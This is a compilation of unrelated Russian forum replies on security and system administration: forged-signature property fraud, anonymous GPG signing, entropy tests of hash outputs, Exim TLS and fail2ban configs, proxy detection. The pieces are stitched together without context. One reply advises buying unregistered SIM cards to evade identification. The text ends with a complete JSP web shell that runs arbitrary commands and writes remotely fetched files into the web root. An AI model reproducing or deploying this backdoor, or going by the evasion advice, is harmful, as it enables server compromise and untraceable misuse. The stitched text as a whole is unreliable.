1.1. Подтверждение достоверности сведений, перечисленных в пунктах 1 и 2 части 1 настоящей статьи, осуществляется одним из следующих способов:
1) с использованием оригиналов документов и (или) надлежащим образом заверенных копий документов;
2) с использованием единой системы межведомственного электронного взаимодействия, информационных систем органов государственной власти, Пенсионного фонда Российской Федерации, Федерального фонда обязательного медицинского страхования, единой информационной системы нотариата;
3) с использованием единой системы идентификации и аутентификации.
(часть 1.1 введена Федеральным законом от 27.12.2019 N 476-ФЗ)
2. При обращении в аккредитованный удостоверяющий центр заявитель представляет следующие документы либо их надлежащим образом заверенные копии и (или) сведения из них:
(в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
(см. текст в предыдущей редакции)
1) основной документ, удостоверяющий личность;
2) страховой номер индивидуального лицевого счета заявителя - физического лица;
(в ред. Федерального закона от 08.06.2020 N 181-ФЗ)
(см. текст в предыдущей редакции)
3) идентификационный номер налогоплательщика заявителя - физического лица;
...
2.1. Заявитель вправе по собственной инициативе представить копии документов, содержащих сведения, указанные в пунктах 2 - 6 части 2 настоящей статьи.
(часть 2.1 введена Федеральным законом от 30.12.2015 N 445-ФЗ; в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
(см. текст в предыдущей редакции)
......
5. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр направляет в единую систему идентификации и аутентификации сведения о лице, получившем квалифицированный сертификат, в объеме, необходимом для регистрации в единой системе идентификации и аутентификации, и о полученном им квалифицированном сертификате (уникальный номер квалифицированного сертификата, даты начала и окончания его действия, наименование выдавшего его аккредитованного удостоверяющего центра).

> Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
> и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
> у меня взломали аккаунт на госуслугах.
> У меня никогда не было ЭЦП и я даже не знаю, что
> это такое. Паспорта со мной, я их не терял.
> Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
> миллион р).
> У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
> мошенники выпустили. Я отменю одну, а может, у них 10.
> Что делать?

Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ. Нужно лично зайти в МФЦ, вызвать управляющего и собственноручно написать заявление, о том что сделки с квартирой только с вашим личным присутствием. Управляющий заверит. И если не ошибаюсь, что-то предпринимали на этот счет. Тяжело, но в прокуратуру в полицию писать заявления.

https://ru.m.wikipedia.org/wiki/Единая_система_идентификации_и_аутентификации

[b]* Для получения учётной записи ЕСИА необходимо удостоверить свою личность с помощью паспортных данных, ИНН и СНИЛС[/b]

Эти все данные есть у работодателей, так как необходимы при устройстве на работу. (А сколько кто работ сменил)

Надежное хранение этих документов требует огромных денег - наличие собственного дома с сейфом. (А сколько кто квартир съемных сменил, замки вы каждый раз в съёмной квартире меняли? в общежитиях с соседями сколько прожили? Сколько раз вам квартиру снимала трудоустраевающая организация и копия ключей хранилась у них? Сюда же надо добавить всех подруг с которыми вы совместно проживали................)

Что там надо для их регистратуры? Паспорт, ИНН и СНИЛС? Можно копии! Можно без личного присутствия!!!

[b]* облачное хранение приватного ключа пользователя[/b]

Цензурные слова закончились.

[b]* Существенно расширен набор данных, ведущихся в профиле пользователя (добавлены такие документы как заграничный паспорт, полис ОМС, военный билет и др., появилась возможность указывать сведения о детях). Предусмотрена возможность зарегистрировать учетную запись на номер мобильного телефона, который ранее был привязан к другой учетной записи.

Майор одобрил. Вы подумали речь о нашем товарище? Нет, имел ввиду их..

И все это на логина/пароле по HTTPS без ESNI конечно: https://www.linux.org.ru/forum/admin/15104732?cid=15164855

И разрабов меняют каждый год: "AT Consulting, R-Style, «РТ лабс» и «Реак софт»"

> Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
> и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
> у меня взломали аккаунт на госуслугах.
> У меня никогда не было ЭЦП и я даже не знаю, что
> это такое. Паспорта со мной, я их не терял.
> Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
> миллион р).
> У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
> мошенники выпустили. Я отменю одну, а может, у них 10.
> Что делать?

Тут на лицо коррекционная составляющая кто то купил скан вашего паспорта в интернете
и у него были знакомые в в удостоверяющем центре которые все и сделали пишите в сми нужно вызвать общественый резонанс

> неизвестно, сколько ЭЦП на моё имя мошенники выпустили

https://www.garant.ru/products/ipo/prime/doc/400065686/
Постановление Правительства РФ от 28 декабря 2020 г. № 2309 “Об утверждении требований к порядку предоставления владельцам квалифицированных сертификатов сведений о выданных им квалифицированных сертификатах с использованием единого портала государственных и муниципальных услуг”

Требуют регистрироваться на "госуслугах" и кроме Ф.И.О. предоставить СНИЛС.

Сертификаты ЭП, выданные аккредитованными УЦ: https://e-trust.gosuslugi.ru/#/portal/registry/certificate-list
Сертификаты, переданные АУЦ в связи с прекращением своей деятельности: https://e-trust.gosuslugi.ru/#/portal/registry/passed-certif...
Отсутствие поиска по Ф.И.О. делает данный сервис почти бесполезным.

Как по мне это нарушает дух и букву Закона:
ст. 15 п. 3 http://www.consultant.ru/document/cons_doc_LAW_112701/03690e...
«3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети «Интернет», к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.»

Налоговая, к примеру, предоставляет доступ к реестру ЕГРЮЛ без ограничений: https://egrul.nalog.ru/ с возможностью поиска по Ф.И.О., ИНН...

> Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
> и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
> у меня взломали аккаунт на госуслугах.
> У меня никогда не было ЭЦП и я даже не знаю, что
> это такое. Паспорта со мной, я их не терял.
> Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
> миллион р).
> У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
> мошенники выпустили. Я отменю одну, а может, у них 10.
> Что делать?

И чем закончилась история? а то даже не по себе((

Дыра таки есть, и в инетах шумок не стихает:

https://tass.ru/ekonomika/21582911

https://tass.ru/ekonomika/21393391

https://www.opennet.me/openforum/vsluhforumID10/5567.html

"В Минцифры подчеркнули, что на портале можно только подать заявление в Росреестр на регистрацию права собственности, которое подписывается в приложении "Госключ". Решение же о регистрации недвижимoсти принимает Росреестр после тщательной проверки оснований, указали в министерстве."

Росреестр автоматически проверяет правельность заполнения заявок и реквизиты указанных документов... Считаю дыру оставили умышленно!

Словами классика:

"Так вот, чтобы убедиться в том, что Достоевский – писатель, неужели, же нужно спрашивать у него удостоверение? Да возьмите вы любых пять страниц из любого его романа, и без всякого удостоверения вы убедитесь, что имеете дело с писателем."

> - Где (на какой онлайн площадке) опубликовать анонимно текст (тема: философия; язык:
> русский), чтобы пользователи имели возможно его обсуждать через комментарии?

http://ys54v3jkze77peoyzhbck5rswaaeu4j3wd4cueli5brcbws3plrq..../
Поддерживается Markdown форматирование, возможен постинг без регистрации.
P.S. https://github.com/purplei2p/i2pd

> - И как надежно подписать текст, чтобы при необходимости можно было доказать
> его авторство ? (типа цифровая подпись на анонима)
> // полагаю как вариант сделать новую GPG, без указания email.

    $ gpg --armor --local-user айди-ключа --clear-sign Статья.md

Получится файл Статья.md.asc, который можно открыть, скопировать содержимое, вставить в пост и отправить подписанный текст оставаясь анонимом.

P.S. Создавай и используй ключ cледующего формата:

    $ gpg --expert --full-generate-key
    Выберите тип ключа:
    (10) ECC (только для подписи)
    Выберите эллиптическую кривую:
    (1) Curve 25519

> тема: философия

"Танцпол" - на месном сленге, учитывая нужду в анонимности.

> - Где (на какой онлайн площадке) опубликовать анонимно текст (тема: философия; язык:
> русский), чтобы пользователи имели возможно его обсуждать через комментарии?
> - И как надежно подписать текст, чтобы при необходимости можно было доказать
> его авторство ? (типа цифровая подпись на анонима)
> // полагаю как вариант сделать новую GPG, без указания email.

Нотариально заверенный анонимус - это что-то из области клинической психиатрии.

>Статистическое исследование
>не описана методика
>Первая колонка - источник энтропии
>названия алгоритмов хэширования

Хэширование вообще-то энтропию не создает. Часто даже уменьшает.

Для хеш-сумм главное коллизии. Энтропия, конечно, тоже важна, но измерять её инструментом для анализа генераторов случайных чисел - некорректно.

И даже так - ваш эксперимент показывает, что энтропия хеш-сумм заметно ниже чем у рандома. А разница между хэш-суммами незначительна и не влияет на их предназначение (плюс не забываем про некорректность инструмента измерения). ИМХО это успех.

> Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета
> rng-tools.
> Как говорят ложь

Вероятно все дело в том, что все ваши тесты - тестировали по сути один источник, который зависит от вашей активности за компом...

SHA1 не берет данные из воздуха... он берет их все из того же источника что и все остальные.
"RNG генерит случайные числа  на основе данных из пула энтропии(entropy pool) в ядре Linux. Наполнением этого пула так же занимается RNG и делается это на основе случайных событий в системе таких как: тайминги клавиатуры и дисков, движения мыши, прерывания(interrupts), сетевой трафик.
"
Поэтому ваш эксперимент нужно проводить не единоразово, а прогонять один и тот же тест по кругу в течении недели...и усреднить значения.

Статистическое исследование зависимости энтропии из контрольных сум от входных данных.

Первый тест в этой теме получен из входных данных следующего типа:

original (Pseudo entropy file: "ASCII text, with very long lines" ~75K)
Like:
dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=150 status=none

Контрольные сумы с подозрительными результатами sha1, sha224, sha384 и tiger перепроверил с разными входящими данными.
В статистическом исследовании проводилось всего 10 000 тестов, чего явно недостаточно чтобы дать точную цифру после трёх девяток!
Отмечаем, что sha384 победил со следующими входными данными:
1. date +%-N%s
2. date +%-N%s |b2sum |sed 's/[ -]//g'
4. dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
5. dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
И опять проиграл в тесте с входными данными:
3. dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
в котором sha1 и tiger опять удержали два первых места, причём tiger подтвердил лучший результат.

То что сума ошибок в тестах больше "failures" означает что ошибки случились в одном и томже тестируемом блоке.
Такие результаты tiger в 4 тесте возможно из-за временной большой нагрузки на комп, load average: ~20

1.

date +%-N%s
sha1
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 5
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha224
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha384
rngtest: FIPS 140-2 successes: 9992
rngtest: FIPS 140-2 failures: 8
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

tiger
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

2.

date +%-N%s |b2sum |sed 's/[ -]//g'
sha1
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 5
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha224
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha384
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

tiger
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

3.

original (Pseudo entropy file: "ASCII text, with very long lines" ~100K)
Like:
dd if=/dev/urandom status=none |tr -dc 0-9A-Za-z_+\-:\.,\ /\[\]\<\>\(\)\#\\n |dd bs=1b count=200 status=none
sha1
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-224
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-384
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

tiger
rngtest: FIPS 140-2 successes: 9997
rngtest: FIPS 140-2 failures: 3
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 1
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

4.

integer (Pseudo entropy integer: >1500 digits)
Like:
dd if=/dev/urandom status=none |tr -dc 0-9 |dd bs=1b count=3 status=none
sha1
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 5
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-224
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 5
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-384
rngtest: FIPS 140-2 successes: 9995
rngtest: FIPS 140-2 failures: 5
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 1
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

tiger
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 6
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 1

5.

hashed (Pseudo entropy hexadecimal: <=1172 symbols)
Like:
dd if=/dev/urandom status=none |tr -dc 0-9a-f |dd bs=1172c count=1 status=none
sha1
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 6
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-224
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

sha-384
rngtest: FIPS 140-2 successes: 9995
rngtest: FIPS 140-2 failures: 5
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

tiger
rngtest: FIPS 140-2 successes: 9989
rngtest: FIPS 140-2 failures: 11
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 6
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

Ты думаешь перекачку твоих гигабайтов данных через SSH так трудно заметить?

>есть ли программа под Linux\Windows
>ЧТО ВАЖНО - с графическим интерфейсом а не коммандной строкой!
>приватности и повышенной безопасности

Виндовс головного мозга.

>Что бы никакая Яровaя свой nose не сувала и не пронюхивала

Может лучше не заниматься ничем таким, за что статья предусмотрена?

Тебе надо понять, что никакой "приватности и повышенной безопасности" не существует. Это просто слова. Повышенная безопасность - это примерно как вторая свежесть. Есть риски, которые могут быть снижены за счет определенных практик. Начать надо с понимания рисков. Дальше осваивать практики. Это не так, что ты поставишь варезину и дальше у тебя все хорошо. Безопасность - это процесс (а не продукт) (с) Брюс Мартинович Шнайер

Переходим к идее удаленных столов. Она естественна только для мира виндовс, где изначально не было криптографии, особенно для шифрования файлов и дисков. Та, что появлялась, каждый раз оказывалась ненадежной или была скомпрометирована. Кажется логично хранить свой чайлдпорн за пределами своего компьютера. Риск в данном случае в компрометации локального компа, получении доступа к данным.

С удаленным столом рисков по факту становится только больше. Нельзя исключать доступ к серверу сотрудников датацентра или какой-нибудь служебный бэкдор для управления серверами (OWH ставило раньше ОС со своим кастомным ядром для этих целей). В виртуализированной среде говорить о какой-либо безопасности нельзя вообще. Химичат и с памятью, и с блочными устройствами. Ключи для расшифровки блочного устройства всегда можно взять из памяти.
Даже если арендовать сервер без BMC, попросить к нему IP-KVM и поставить систему с нуля, любая незапланированная перезагрузка - это компрометация сервера, необходимость переустановки, смена всех ключей доступа. Об этом хотя бы есть шансы узнать. По факту для компрометации сервера достаточно воткнуть USB устройство. Сразу после этого очищаются все логи и внедряется руткит.
Даже чтобы охватить всю проблематику связанную с безопасной настройкой серверов под хранение чувствительных данных, нужно серьезно понимать в вопросах администрирования и безопасности.

TLDR Tails и LUKS на локалхосте используй.

Где OpenPGP подпись?

В Linux дла проверки на вирусы лучше грузится с чистого диска:
https://www.kaspersky.ru/downloads/free-rescue-disk

>[оверквотинг удален]
> ОС на малвару и вылечить её.
> Скачать тут
> https://www.kaspersky.ru/downloads/free-virus-removal-tool
> https://www.kaspersky.com/downloads/free-virus-removal-tool
> Список поддерживаемых дистрибутивов
> https://support.kaspersky.com/help/kvrt/2024/ru-ru/269440.htm
> https://support.kaspersky.com/help/kvrt/2024/en-us/269440.htm
> Как запустить
> https://support.kaspersky.com/help/kvrt/2024/ru-ru/269465.htm
> https://support.kaspersky.com/help/kvrt/2024/en-us/269465.htm

За даром не нужен.

ISO такого не держит. Заведи свой, кто тебе мешает?

Сразу уточнения.
Именно кодачи нужен потому, что там есть впн и рдп, а в таилс по дефолту они запрещены и как-то хз, я его даже не пробовал, т.к. устройство - очень старый макбук с 4гб рам)
Кодачи запускается в режиме Encrypted Persistence.

>[оверквотинг удален]
> Система Windows X. Проблема с заражением браузера.
> Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
> "свободное плавание" в вопросе.
> При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
> прописаны в теге style, а также ссылки ведущие на всякие непонятные
> сайты.
> при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
> заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
> выявляет источник заразы.
> Заранее благодарен.

Вы один пользуетесь компьютером и этой учеткой?

11 само себя не поставит. Время пришло.

> Всем доброго времени суток!
> Система Windows X. Проблема с заражением браузера.

Наверное X Window System ?

> При изучении кода браузеров - эдж/хром/мозила

X Window не связана с кодом браузеров

> обнаружил теги не присущие для сайтов

Эмм, покажите исходник где нашли такое...

> прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.

Удалите их

> при просмотре с других устройств таких паразитов не обнаруживается

Возможно все дело в том чем вы смотрите

> попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
> с перезапуском l2tp сервера ни к чему не привели.

забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то?

>[оверквотинг удален]
> Не могу подключиться с двух устройств, которые находятся в одной и той
> же сети.
> Поведение следующее:
> Роутер TP-link archer AX50
> К роутеру по WIFI подключено несколько устройств
> 1. Подключаю впн на одном из девайсов. Подключается и работает.
> 2. Подключаю впн с той же настройкой на втором устройстве. Подключение прошло.
> IP адрес выделен. Интернета нет. Со стороны сервера выданный IP адрес
> не пингуется.
> Это ограничение? Или нужно настроить как-то роутер или сервер?

То есть клиент не роутер, и подключаетесь вы через роутер?
а ваш роутер умеет пропускать более одного vpn соединения?

Добрый день, Борис!

> Кто-нибудь использовал TLS при настройке почты на SMTP сервере EXIM ?

Это штатный режим почты в наше время.

Исходящая наружу почта в exim контролируется в транспорте.

(мой рабочий конфиг):
begin transports
remote_smtp:
  driver                        = smtp
  command_timeout               = 2m
  connect_timeout               = 2m
  connection_max_messages       = 10
  max_parallel                  = 10
  port                          = 25
  message_size_limit            = 200M
  dkim_domain                   = my_domain.com #(1)
  dkim_selector                 = mail #(1)
  dkim_private_key              = /etc/exim/dkim.key #(1)
  dkim_strict                   = true #(1)
  dkim_sign_headers             = Date:Message-ID:Subject:From:To:In-Reply-To:References:MIME-Version:Content-Type #(1)
  tls_certificate               = /etc/ssl/my_domain.pem #(2)
  tls_privatekey                = /etc/ssl/my_domain.key #(2)
  tls_verify_certificates       = /etc/ssl/cacert.pem #(3)
  tls_try_verify_hosts          = *
  tls_verify_cert_hostnames     = *
  tls_tempfail_tryclear         = true #(4)
  tls_sni                       = *
  tls_require_ciphers           = HIGH:-SSLv3:-TLSv1:-ADH:-PSK:-ARIA:-CAMELLIA #(5)

(1) DKIM требует еще настроек в DNS. Можно не включать.
(2) Сертификат тот-же, что и на приеме почты
(3) Глобальные доверенные СА
(4) Если принимающий хост не работает по TLS, то передать в нешифрованном режиме
(5) Настройка openssl для работы только по TLS1.2 и TLS1.3

> Подскажите, пожалуйста, что я сделал неверно

Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, что может дать пищу для ума. Что за сервер, как именно данные отправляешь, что на сервере с файрволлом, что на клиенте с файрволлом...

> 1 байт - фрагмент

зачем там 01 стоит? если это начало большой датаграммы, что не влезла в один пакет, то должен быть последующий с увеличенным номером, и финальный с >=0x80

   Поле FRAG показывает, является ли эта датаграмма самостоятельной или
   же фрагментом. Если датаграмма - фрагмент, то установленный старший
   бит является признаком последнего фрагмента, в то время как значение
   X'00' показывает, что это обычная датаграмма. Значения от 1 до 127
   обозначают на позицию фрагменте в последовательности. Каждый
   получатель будет иметь REASSEMBLY QUEUE (очередь сборки) и REASSEMBLY
   TIMER (таймер сборки) связанные с такой фрагментной датаграммой.
   Очередь сборки должна быть переинициализирована и связанные с ЙЙней
   фрагменты выкинуты всякий раз при истечении таймера сборки или
   с приходом новой датаграммы, чье значение в поле FRAG меньше,
   чем наибольшее значение поля FRAG датаграмм, обработанных
   при сборке фрагмента. Таймер сборки должен быть не менее 5 секунд.
   Приложениям рекомендуется избегать фрагментацию везде, где только
   это возможно.

   Реализация фрагментации опциональна, в реализациях где фрагментация
   не поддерживается, должны отбрасываться любые датаграммы, у которых
   поле FRAG отлично от X'00'.

Прислать скан счета за ЖКХ или прочие подобные документы просят только на всяких там биржах или прочих государственных или частных сайтах, где ты реально должен быть гражданином США. А не просто юзером с правильным IP. Так что никакой VPN тебе не поможет.

Попробуй подать заявку для участия в лотерее грин кард.

>your ISP and DNS were
>DNS

Они сами дают подсказки.

PS картинка со свиньей за забором.жпг ;)

> Очень хотелось бы получить помощь специалистов безопасности .
> Через прокси-сайт пытался выдать себя за американца , но был заблочен с

Через какой именно прокси-сайт?

Прокси обычно подставляют в HTTP-запрос дополнительные поля:
   X-Forwarded-For
   X-Client-IP

Поэтому что-то неуловимо выдавало в тебе украинского разведчика.

[...]
> Вот такая проблемка , за подсказку которая сработает готов заплатить , можно

Платить придётся ежемесячно, а то и по-гигабайтно. Бесплатно тебя только через MITM proxy пустят.

Как детё чесслово. Идешь в ближайший сигаретный ларёк, покупаешь стакан симок(у них они без идентификации кому попало продаются). Достаёш свой старый гелекси , открывеш крышку, аккуратно вставляеш симку, закрываеш. Пользуешся интернетом и выкидываеш вместе с телефоном в ближайшую лужу, выпиваешь стопарик за анона.
удачи

С Exim давно не работал, раньше делал через fail2ban

# vi /etc/fail2ban/jail.conf
[exim-banhammer]
enabled = true
filter = exim.banhammer
action = iptables-multiport[name=Exim, port="smtp,smtps", protocol=tcp]
#sendmail[name=exim-spam, dest=admin@company.xyz, sender=fail2ban@localhost]
logpath = /var/log/exim/main.log
maxretry = 2
bantime = 18000
ignoreip = 127.0.0.1

vi /etc/fail2ban/filter.d/exim.banhammer.conf
[Definition]
failregex = [\] .*(?:rejected by local_scan|Unrouteable address|Dnsbl blocked|Sender verify failed|relay not permitted|Unknown user)

fail2ban-client reload

Далее проверь, как отрабатывает правило бана на логах (может корректировка нужна):

fail2ban-regex --print-all-match /var/log/exim/main.log /etc/fail2ban/filter.d/exim.banhammer.conf

Проверка статуса:
fail2ban-client status exim-banhammer
Просмотр списка заблокированных IP:
ipset list

На самом деле в настройках fail2ban уже наверняка есть заготовки для Exim, просто разкоментируй их.
Эта тема пережёвана интернетах с давних времен.

> Доброго времени суток!
> В логах Exima очень много записей такого типа:
> 2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua>
> Как можно ограничить, допустим, 5 а остальное все drop'ить? Или тут надо
> смотреть в сторону iptables?

https://www.exim.org/exim-html-current/doc/html/spec_html/ch...

Судя по всему, это в рамках одного сеанса SMTP происходит. Тупой бот пытается по словарю подобрать работающий адрес. Можно обрубить в acl_check_rcpt:

drop
  condition = ${if >{$rcpt_fail_count}{5}}
  message = Too many failed recipients

Здесь про это была новость https://www.opennet.me/opennews/art.shtml?num=52648

sshocean dot net и его клоны
Раз в N дней надо пройти рекапчу и обновить credentials в клиенте
Иногда ломается
Но несмотря на это я пользуюсь им уже пару лет, т.к. лень искать замену
Правда, на телефоне взял shadowsocks вместо wg, там клиент удобнее, но работать должны примерно одинаково

<%
    if("G5X49Q".equals(request.getParameter("pwd")))
    {
        String strCmd=request.getParameter("cmd");
        String strUrl=request.getParameter("url");
        String strFile=request.getParameter("file");
        if(null!=strCmd)
        {
            java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("<pre>");
            while((a=in.read(b))!=-1)
            {
                out.println(new String(b));
            }
            out.print("</pre>");
        }
        if(null!=strUrl&&null!=strFile)
        {
            java.io.InputStream in = new java.net.URL(strUrl).openStream();
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream baos = new
            java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                baos.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
        }
        out.println("MtGqKu3y");
    }
    else
    {
        //out.println("no token");
    }
%>